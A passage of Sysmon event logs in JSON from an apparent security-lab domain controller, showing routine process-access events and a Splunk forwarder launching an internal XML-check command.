05:46:50.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2093,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2094,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2095,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2096,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2097,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2098,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-001050EE0300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-001050EE0300}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2099,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.113\r\nProcessGuid: {A837DB8D-01CA-5F25-0000-0010FFEE0300}\r\nProcessId: 3940\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {A837DB8D-01CA-5F25-0000-001050EE0300}\r\nParentProcessId: 3852\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.113","ProcessGuid":"{A837DB8D-01CA-5F25-0000-0010FFEE0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{A837DB8D-01CA-5F25-0000-001050EE0300}","ParentProcessId":"3852","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2100,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01CA-5F25-0000-001050EE0300}\r\nSourceProcessId: 3852\r\nSourceThreadId: 3856\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010FFEE0300}\r\nTargetProcessId: 3940\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01CA-5F25-0000-001050EE0300}","SourceProcessId":"3852","SourceThreadId":"3856","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010FFEE0300}","TargetProcessId":"3940","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2101,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010FFEE0300}\r\nTargetProcessId: 3940\r\nTargetImage: 